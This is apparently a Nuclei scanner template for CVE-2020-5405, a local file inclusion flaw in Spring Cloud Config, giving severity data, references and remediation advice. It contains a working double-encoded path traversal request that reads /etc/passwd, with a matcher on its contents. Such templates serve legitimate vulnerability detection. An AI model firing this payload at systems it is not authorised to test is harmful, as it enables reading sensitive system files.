id: CVE-2020-5405 info: name: Spring Cloud Config - Local File Inclusion author: harshbothra_ severity: medium description: Spring Cloud Config versions 2.2.x prior to 2.2.2, 2.1.x prior to 2.1.7, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files through the spring-cloud-config-server module. remediation: | Upgrade to a patched version of Spring Cloud Config or apply the recommended security patches to mitigate the vulnerability. reference: - https://pivotal.io/security/cve-2020-5405 - https://nvd.nist.gov/vuln/detail/CVE-2020-5405 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2020-5405 cwe-id: CWE-22,CWE-23 epss-score: 0.00258 epss-percentile: 0.63433 cpe: cpe:2.3:a:vmware:spring_cloud_config:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware product: spring_cloud_config tags: cve,cve2020,lfi,springcloud http: - method: GET path: - '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd' matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4a0a00473045022100bd393682ce06a35e089589a1001f0fb9bf2ce5ba26e012671f5f7097542549b7022029dc674e0a1f9a31ec481ae169b65d3720572973c0646b0389ce11b804e09ac8:922c64590222798bb761d5b6d8e72950